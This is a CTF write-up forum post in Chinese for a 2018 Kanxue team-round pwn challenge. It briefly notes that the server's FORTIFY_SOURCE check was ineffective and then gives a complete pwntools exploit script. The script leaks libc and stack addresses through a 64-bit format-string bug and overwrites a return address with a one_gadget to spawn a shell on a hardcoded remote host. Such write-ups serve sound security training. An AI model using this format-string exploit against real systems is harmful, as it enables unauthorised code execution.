-
-
[原创] 看雪ctf 2018 团队赛 - 你眼中的世界
-
2018-12-27 17:08
4238
-
[原创] 看雪ctf 2018 团队赛 - 你眼中的世界
64bit 格式化,服务器环境貌似搞得不好,原本的fortify_source 没有用了,直接暴力写个one_gadget 就完事了
❯ nc 211.159.175.39 8686
echo from your heart
lens of your word: 10
word: %n
echo:
lens of your word: ^C
本地------
[root@aqsv] ~/pediy
❯ ./echo_from_your_heart
echo from your heart
lens of your word: 10
word: %n
echo: *** %n in writable segment detected ***
[1] 26614 abort (core dumped) ./echo_from_your_heart
丑陋的exp = =
from pwn import *
p=remote('211.159.175.39',8686)
def oneloop(payload):
p.sendlineafter('your word:',str(len(payload)+10))
p.sendlineafter('word:',payload)
payload=''.join(['%{}$016lx '.format(str(x)) for x in range(1,39)])
oneloop(payload)
leak= p.recvuntil("lens",drop=True).strip().split(' ')
libcleak=int(leak[8],16)-240-0x20740
one_gadget=libcleak+0x45216
stackleak=int(leak[10],16)
p.info("libcleak "+hex(libcleak))
p.info("stackleak "+hex(stackleak))
p.info("one_gadget "+hex(one_gadget))
payload='%{}c%10$hn'.format(str(-0xe0+stackleak&0xffff))
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)])
oneloop(payload)
payload='%{}c%36$hn'.format(str(one_gadget&0xffff))
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)])
oneloop(payload)
payload='%{}c%10$hn'.format(str(-0xe0+2+stackleak&0xffff))
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,10)])
oneloop(payload)
payload='%{}c%36$hhn'.format(str((one_gadget>>16)&0xffff))
payload+=''.join(['%{}$016lx '.format(str(x)) for x in range(1,36)])
oneloop(payload)
p.interactive()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2018-12-28 11:43
被aqs编辑
,原因:
